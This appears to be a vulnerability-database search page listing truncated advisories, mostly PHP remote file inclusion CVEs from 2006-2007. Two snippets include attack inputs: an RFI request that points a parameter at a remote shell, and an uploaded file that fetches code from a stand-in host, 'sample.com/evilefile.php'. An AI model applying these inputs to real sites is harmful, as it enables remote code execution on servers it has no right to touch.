1622 matches found
Magic News Plus 1.0.2 - 'news.php?&link_parameters' Cross-Site Scripting
source: https://www.securityfocus.com/bid/22661/info Magic News Pro is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. These issues include a remote file-include issue and two cross-site scripting vulnerabilities. An...
CVE-2007-0983
PHP remote file inclusion vulnerability in admin/nav.php in AT Contenator 1.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the RootToScript parameter...
Meganoides News 1.1.1 - Include.php Remote File Inclusion
Meganoides News 1.1.1 - Include.php Remote File Inclusion source: https://www.securityfocus.com/bid/22589/info Meganoide's news is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PH...
CVE-2006-7003
PHP remote file inclusion vulnerability in admin/index.php in Fusion Polls allows remote attackers to execute arbitrary PHP code via a URL in the xtrphome parameter...
eXtreme File Hosting remote file upload vulnerability
A security bug have been discovered in eXtreme File Hosting, which can be upload the attaker files and can get the shell with phpshell. bug : in this borgram with php can user upload zip or rar file hacker can upload the a.php.rar file that contain ?php $file = 'http://sample.com/evilefile.php';...
Remote file inclusion
PHP remote file inclusion vulnerability in index.php in gnopaste 0.5.3 and earlier allows remote attackers to execute arbitrary PHP code via the GNPREALPATH parameter. NOTE: CVE and a third party dispute this issue, since GNPREALPATH is a constant, not a variable...
Remote file inclusion
PHP remote file inclusion vulnerability in examples/inc/top.inc.php in AgerMenu 0.03 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the rootdir parameter...
CVE-2007-0831
Multiple PHP remote file inclusion vulnerabilities in Atsphp 5.0.1 allow remote attackers to execute arbitrary PHP code via a URL in the CONFpath parameter to 1 index.php, 2 sources/usercp.php, or 3 sources/admin.php. NOTE: Another researcher has disputed this vulnerability, noting that CONFpath ...
CVE-2007-0808
PHP remote file inclusion vulnerability in Mina Ajans Script allows remote attackers to execute arbitrary PHP code via a URL in the syf parameter to an unspecified PHP script...
CVE-2007-0809
PHP remote file inclusion vulnerability in includes/classtemplate.php in Categories hierarchy aka CH or mod-CH 2.1.2 in ptirhiikmods allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...
CVE-2007-0785
PHP remote file inclusion vulnerability in previewtheme.php in Flipsource Flip 2.01-final 1.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the incpath parameter...
Remote file inclusion
PHP remote file inclusion vulnerability in index.php in Miguel Nunes Call of Duty 2 CoD2 DreamStats System 4.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the rootpath parameter...
CVE-2007-0704
PHP remote file inclusion vulnerability in install.php in Somery 0.4.6 allows remote attackers to execute arbitrary PHP code via a URL in the skindir parameter, a different vector than CVE-2006-4669. NOTE: the documentation says to remove install.php after installation...
CVE-2007-0699
PHP remote file inclusion vulnerability in includes/includes.php in Guernion Sylvain Portail Web Php aka Gsylvain35 Portail Web, PwP before 2.5.1.1 allows remote attackers to execute arbitrary PHP code via a URL in the sitepath parameter...
CVE-2006-6966
CVE-2006-6966 affects phpGraphy before 0.9.13a. The flaw arises when input data includes a numeric parameter whose value matches a hash value of an alphanumeric parameter, allowing a remote attacker to execute arbitrary PHP code by uploading a config.php via the pictures[] parameter to index.php....
PhpMyRing <= 4.1.3b (path) Remote File Include Vulnerability
Title : PhpMyRing = 4.1.3b path Remote File Include Vulnerability Author : ajann Contact : : S.Page : http://www.microniko.net/phpmyring/ $$ : Free ERROR .. ... ..... ? include $fichier.".php"; ? .. ... ..... ERROR RFI http://target/path//lang/leslangues.php?fichier=SHELL Example:...
Remote file inclusion
PHP remote file inclusion vulnerability in ainsmain.php in Johannes Gijsbers aka Taradino Ad Fundum Integratable News Script AINS 0.02b allows remote attackers to execute arbitrary PHP code via a URL in the ainspath parameter...
Remote file inclusion
PHP remote file inclusion vulnerability in functions.php in EclipseBB 0.5.0 Lite allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...
CVE-2007-0570
PHP remote file inclusion vulnerability in ainsmain.php in Johannes Gijsbers aka Taradino Ad Fundum Integratable News Script AINS 0.02b allows remote attackers to execute arbitrary PHP code via a URL in the ainspath parameter...
CVE-2006-6957
PHP remote file inclusion vulnerability in addons/modmedia/body.php in Docebo 3.0.3 and earlier, when registerglobals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALSwhereframework parameter. NOTE: this issue might be resultant from a global overwrite...